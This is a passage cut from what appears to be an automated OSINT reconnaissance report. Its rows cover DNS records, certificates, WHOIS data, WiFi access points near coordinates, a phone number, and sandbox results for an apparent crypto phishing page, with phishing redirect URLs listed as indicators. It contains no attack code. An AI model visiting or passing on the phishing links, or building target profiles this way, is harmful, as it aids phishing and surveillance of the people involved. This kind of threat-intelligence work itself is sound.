match: "https://api.salesflare.com/,a=new"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.comAccept-Language"\n Heuristic match: "hctp_://rabet_anatkoo_ha.com"\n Pattern match: "https://llink.toaccess-control-allow-credentials"\n Pattern match: "https://llink.to"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025319012595231055838270143998031019620*"\n Pattern match: "MUIDB0843E9110DDB6B4E0942FBDE0C5F6A01ieonline.microsoft.com/9216229670643231098083269878373031019620*"\n Heuristic match: "rabetsanatkoosha.com"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*MUID0843E9110DDB6B4E0942FBDE0C5F6A01microsoft.com/1025229670643231098083269862748031019620*_EDGE_V1microsoft.com/9216229670643231098083269878373031019620*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*MUID0843E9110DDB6B4E0942FBDE0C5F6A01microsoft.com/1025229670643231098083269862748031019620*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "www.msn.com/"\n Pattern match: "https://rabetsanatkoosha.com/SNS/allianzgi.com/aBC@allianzgi.com"\n Pattern match: "llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Heuristic match: "ianzgi.com"\n Heuristic match: "link.to"\n Heuristic match: "u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Heuristic match: "api.ipify.org"\n Heuristic match: "checkip.amazonaws.com"\n Heuristic match: "checkip.dyndns.com"\n Heuristic match: "checkip.dyndns.org"\n Heuristic match: "checkip.org"\n Heuristic match: "checkmyip.com"\n Heuristic match: "cmyip.com"\n Heuristic match: "curlmyip.com"\n Heuristic match: "findmyip.org"\n Heuristic match: "formyip.com"\n Heuristic match: "geoip.co.uk"\n Heuris |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Expires": ["Fri, 01 Jan 1990 00:00:00 GMT"], "Vary": ["Accept-Encoding"], "Host": ["87.248.157.102:2079"], "Server": ["cPanel"], "Connection": ["close"], "Www_Authenticate": ["Basic realm=\"Horde DAV Server\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | motorola 8A4 (Net ID: 00:0C:E5:4D:D8:A4) | 39.0469, -77.4903 |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 211.30.196.104.bc.googleusercontent.com | 104.196.30.211 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:34:48:36:b2:51:77:1f:45:f7:ca:23:53:09:6b:f8:20:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:18 2022 GMT
Not After : Mar 27 01:46:17 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b7:86:7e:22:b8:47:2a:2a:20:fc:69:54:4c:4c:
8d:ea:3f:a1:0c:0e:11:0f:7e:c1:26:df:52:aa:7e:
94:3a:df:e1:4c:c1:e1:54:54:7a:c2:7a:eb:d8:cc:
df:41:19:00:a3:7b:e6:18:3e:51:47:37:04:be:39:
e6:bf:91:38:96:6a:40:69:b8:63:75:51:8c:52:3a:
41:07:8f:c4:ec:e7:d6:72:77:98:6d:17:b7:fd:4c:
4c:0f:1e:e2:38:f3:1e:28:62:8d:25:cc:29:b7:fc:
af:91:3e:9d:e5:92:07:d2:8d:09:ca:64:eb:80:76:
ae:38:a2:33:49:07:84:c8:02:f9:d3:21:2b:ce:01:
78:68:73:b9:2a:22:16:eb:78:90:34:44:73:52:fa:
b4:e5:7a:78:b5:62:9e:70:95:d0:26:0e:c1:b7:b4:
12:fd:9f:10:09:67:d9:3c:f0:82:32:ed:27:d0:55:
a7:30:ce:0b:b7:0a:ef:86:ec:19:5d:c1:a0:11:f8:
d8:f7:da:51:1c:ce:c6:23:90:13:7e:ab:f3:de:c1:
8e:52:9d:26:8b:16:dc:5c:ae:23:f8:3d:43:96:47:
e1:0d:83:73:94:c2:e5:ad:91:ed:93:fe:48:67:3b:
6c:8e:00:5a:b6:2f:0f:94:18:91:b3:ed:bb:bf:d8:
25:d1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
73:BD:0E:B3:ED:9F:6A:FE:37:97:44:54:03:BB:B6:CC:83:95:C8:48
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:46:18.221 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:73:56:94:2F:31:A8:B8:1A:98:8B:10:59:
F6:53:2E:1E:0E:70:CF:6D:BF:D5:0A:CF:1C:31:3D:5B:
4C:23:37:67:02:21:00:9B:F2:01:A0:12:B4:3C:90:39:
EA:84:E4:22:FA:75:BD:A0:C4:ED:89:F2:6C:18:97:FC:
B8:F5:F0:56:AE:8E:01
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:46:18.274 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:05:3B:2E:33:08:22:D3:2E:0C:71:5D:CE:
BB:25:C6:58:42:B3:AE:CA:D4:8F:0C:AD:30:6E:E3:A1:
6E:7B:1D:DD:02:21:00:B2:4C:68:98:17:12:76:10:DB:
F7:E5:7C:1B:1E:CC:3D:22:69:57:D1:43:50:5C:F3:6B:
C4:4A:45:D2:97:77:5D
Signature Algorithm: sha256WithRSAEncryption
b5:fc:32:be:0b:ef:36:0b:4c:2f:42:14:e0:23:44:71:fe:bb:
33:07:72:8b:73:2a:ff:5f:08:8a:b4:9e:62:31:57:db:a3:8b:
f5:eb:48:64:20:6d:a4:a1:01:ca:d1:c5:02:57:6b:fa:f9:2f:
81:b9:22:b3:b6:f7:75:49:42:43:c2:49:2f:7b:79:d9:5f:e2:
e1:45:6e:ec:6b:80:ad:7d:c6:5c:28:b1:1a:b9:4e:15:e6:17:
ae:e5:e8:ce:6c:bb:82:2d:39:fb:ee:42:88:dd:71:2d:32:a2:
58:59:d5:82:ef:a1:1f:ed:eb:e8:31:65:9c:54:f9:39:7e:04:
23:d4:63:6c:f9:8a:fc:fe:32:6a:54:24:b9:87:53:d3:3a:ad:
b3:bc:74:e2:09:7e:05:f6:6a:b2:b2:c9:5d:15:04:56:51:5c:
3a:24:39:1f:c5:f0:1f:67:f8:ff:79:1d:11:62:57:f1:41:b4:
c9:fc:7e:59:46:0a:3f:48:58:e0:4d:a6:0a:10:72:2e:ed:1f:
b6:1b:19:4d:de:20:09:8c:c8:8c:26:1e:82:7a:3b:88:90:1a:
7c:c4:2b:f0:2f:ca:82:25:42:7e:50:54:62:30:3f:49:63:0c:
7d:f1:3b:f3:90:d8:3c:ee:c3:09:83:3d:a5:08:3a:22:6f:f5:
e3:2e:e6:d2
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:EC:D6:A2) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abusecomplaints@markmonitor.com | Domain Name: GITHUBUSERCONTENT.COM
Registry Domain ID: 1845671923_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-01-05T09:12:39Z
Creation Date: 2014-02-06T21:17:00Z
Registry Expiry Date: 2024-02-06T21:17:00Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: DNS1.P01.NSONE.NET
Name Server: DNS2.P01.NSONE.NET
Name Server: DNS3.P01.NSONE.NET
Name Server: DNS4.P01.NSONE.NET
Name Server: NS-1411.AWSDNS-48.ORG
Name Server: NS-181.AWSDNS-22.COM
Name Server: NS-1867.AWSDNS-41.CO.UK
Name Server: NS-596.AWSDNS-10.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
|
| 2023-05-12 02:54:16 | HTTP Headers | No | Web Spider | 6 | 0 | 2 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} | oldfluid.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | postcrossing (Category: social)
https://www.postcrossing.com/user/login | login |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:62:27:a6:dc:16:28:de:ae:a0:a4:7d:7e:a0:02:81:25:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 21:24:59 2022 GMT
Not After : Mar 18 21:24:58 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:7a:cf:72:75:e0:23:b5:24:56:0b:ff:81:dc:
d9:ef:b9:84:a5:cb:15:5a:f2:4d:f6:46:6d:b0:47:
aa:99:c5:97:75:9e:1e:5a:4f:3a:12:c1:33:26:f0:
0f:b9:47:15:ee:28:b3:c5:a0:0e:6e:82:c2:e4:9e:
2f:89:8d:b1:98:56:ae:4e:51:dc:76:c6:4d:f7:a0:
da:11:9a:d1:d4:0e:53:d9:8e:4c:35:dc:f0:9d:a8:
b5:1d:3f:0a:c6:d4:12:00:be:6b:8b:db:1c:eb:ff:
fa:8a:0d:30:cf:48:30:73:35:bc:e5:39:78:d6:97:
a1:00:9f:88:3e:2a:d4:35:22:13:80:4e:57:e4:0b:
6b:33:da:ae:7f:1b:ed:8f:82:10:4f:76:18:82:03:
22:e6:2a:88:53:b9:9a:80:d1:10:21:d7:25:be:5d:
9e:dd:23:0e:2f:8b:44:b5:d9:a6:ea:9a:ef:d4:ac:
24:ea:27:de:5f:35:74:c4:ee:db:95:49:53:28:21:
da:c7:71:d0:ef:75:13:d9:75:8b:84:42:b8:62:af:
7a:1c:85:43:b6:85:1f:19:fe:11:de:22:13:41:a7:
26:69:56:b7:56:8c:31:f6:46:81:6d:dd:94:ae:81:
bb:82:f2:fb:15:03:15:a0:92:6d:46:ee:3b:be:82:
d4:cc:f6:b8:f0:82:0e:be:9c:1b:d5:a9:e7:74:12:
18:51:f1:a4:d7:96:be:07:63:2a:5b:b2:de:3e:8d:
99:72:fa:17:ce:36:64:cf:aa:ef:2b:4c:60:46:d0:
cb:1a:9e:bb:94:71:19:32:32:aa:a0:4f:7c:b5:80:
d2:ac:29:a1:3e:79:7a:46:f9:fc:2c:b9:f9:8b:cb:
59:c4:7c:ae:87:57:d8:e5:12:0a:0b:a5:34:e8:72:
2f:e5:15:84:33:1d:01:b8:f5:d1:2b:ff:10:f9:e7:
ef:0c:be:61:fe:87:b7:d8:4f:dc:f0:08:3e:e4:ba:
53:2e:94:64:aa:29:45:65:cb:b5:3b:5d:cd:a7:33:
69:f9:c8:07:c0:c9:87:da:c3:82:4b:50:90:d2:80:
18:a8:e3:89:70:e0:61:b8:c9:4f:82:66:2b:0e:23:
36:49:33:34:63:e7:8a:70:61:f2:a3:6d:68:5c:13:
84:18:1d:5c:05:3c:2b:f0:28:3d:ae:ff:ba:af:c4:
48:bb:d7:f2:a8:15:4b:68:f4:b5:9d:7c:d4:31:43:
bf:01:12:bc:59:5f:ef:ce:fb:0e:78:b7:62:51:52:
0f:d1:8e:d7:11:fa:d7:0c:57:e7:ee:bd:a5:16:b1:
30:a1:96:90:5b:b4:a4:e1:b1:72:88:e0:56:6f:9c:
5b:43:b9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:29:A0:EB:78:CC:40:89:5B:55:A3:66:D6:68:C3:AE:DF:AB:BB:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 18 22:24:59.092 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:ED:60:61:6F:BC:46:EA:80:D9:9B:7E:
8F:A6:97:51:13:A3:13:6E:09:4B:69:DE:76:DA:06:A4:
9A:F6:AD:26:7A:02:21:00:8D:70:0F:85:A2:37:40:B9:
EB:5B:60:8F:DC:06:DD:16:63:C3:4B:C4:FC:99:B1:34:
98:6B:48:67:B4:F0:C6:4E
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 18 22:24:59.634 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B5:D7:F6:4B:EA:EE:D1:88:2A:2C:A7:
F5:CC:0E:34:73:06:3D:CB:97:DC:EE:36:A9:A5:D7:84:
82:BC:B5:EB:C6:02:20:24:29:13:50:A0:1B:E8:D7:8C:
B3:4A:9A:51:F0:3A:9F:E5:82:84:2A:82:72:A2:11:F0:
F6:5B:BD:6F:C1:6E:17
Signature Algorithm: sha256WithRSAEncryption
9e:bd:00:c7:d3:5f:8b:8e:53:b7:5b:22:5d:0b:6d:c4:d2:9f:
fb:d0:a2:7c:44:da:e1:f0:45:3d:e8:3d:22:cc:24:5a:a4:77:
b1:7e:a7:5b:7d:47:e3:cc:9f:21:7b:68:ee:4b:fd:96:93:76:
17:26:af:1b:c0:e8:25:4c:33:00:f1:c2:7c:74:4c:aa:65:ed:
92:ae:6a:f9:36:e7:ca:f4:22:6d:f0:eb:29:e7:93:7f:63:23:
5f:e2:ba:1f:83:d2:38:d1:dc:cc:25:4e:61:6b:39:9c:a8:a4:
1a:fc:f9:45:e4:a1:28:63:0f:69:f3:83:90:4b:3d:de:98:18:
fa:e8:6b:3c:fb:c2:5d:0d:ab:ed:f9:00:6d:a0:26:46:2f:05:
46:31:32:5f:a6:1d:17:f4:1e:34:3a:f6:2e:f1:f6:1f:09:08:
8f:de:c7:cd:9f:0a:d6:37:e5:8e:ad:71:44:31:1f:ee:c8:d7:
1e:cb:c5:98:bf:4b:bf:03:59:91:6e:75:8b:e9:11:d9:3b:3a:
e6:90:a3:02:49:4e:21:28:66:07:46:87:31:86:8a:ff:ea:59:
d0:c3:7e:c2:6d:3c:37:07:a6:50:55:a2:45:9b:f8:71:ef:35:
ed:7a:04:62:6e:f1:59:e7:59:4b:40:35:fd:a2:ed:39:31:90:
80:53:1f:29
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:09:5B:FC:D9:A0) | 39.0469, -77.4903 |
| 2023-05-12 03:11:26 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+14806242599', u'local': u'(480) 624-2599'}, u'country': {u'prefix': u'+1', u'code': u'US', u'name': u'United States'}, u'phone': u'+14806242599', u'valid': True, u'location': u'Arizona', u'carrier': u'', u'type': u'unknown'} | +14806242599 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Picsart (Category: art)
https://picsart.com/u/login | login |
| 2023-05-12 02:45:34 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | battleb0t.xyz. 86400 IN NS daphne.ns.cloudflare.com.
battleb0t.xyz. 86400 IN NS skip.ns.cloudflare.com. | battleb0t.xyz |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5de9314c41108c-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 03:03:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 001cat.github.io |
| 2023-05-12 02:55:18 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | openssh | 46.101.229.70 |
| 2023-05-12 02:45:50 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Montreal, Quebec, H4X, United States, North America | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:54:07 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SWKIDNEY1 (Net ID: 00:02:6F:ED:54:F8) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F6:1A:16) | 41.8781, -87.6298 |
| 2023-05-12 02:54:44 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 35.229.48.0/20 | 35.229.48.116 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | notatestuser@gmail.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/walletconnect/walletconnect-monorepo/releases/download/1.7.8/web3-provider.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/js/modal.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/jkup/focusable/blob/master/index.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://lens-protocoll.xyz/webc/index.php', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_588_IESQMMUTEX_0_519"\n "IsoScope_588_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_588_IESQMMUTEX_0_331"\n "IsoScope_588_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1416"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_588_ConnHashTable<1416>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_588_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.70:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "65.8.158.85:443"\n "151.101.1.229:443"\n "104.16.123.175:443"\n "192.30.255.113:443"\n "185.199.108.153:443"\n "185.199.108.133:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.ethers.io"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "etherum-libs.github.io"\n "github.com"\n "lens-protocoll.xyz"\n "objects.githubusercontent.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="Keywords" content="Lens Protocol - Claiming App\n Lens Protocol - Claiming App a paypal\n Lens Protocol - Claiming App a binance\n Lens Protocol - Claiming App harmony"/>" (Indicator: "dir "; File: "urlref_httpslens-protocoll.xyzwebcindex.php")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"(0, properties_1.defineReadOnly)(this, "publicKey", signingKey.compressedPublicKey);" (Source: jqueryjs_1_.js, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', 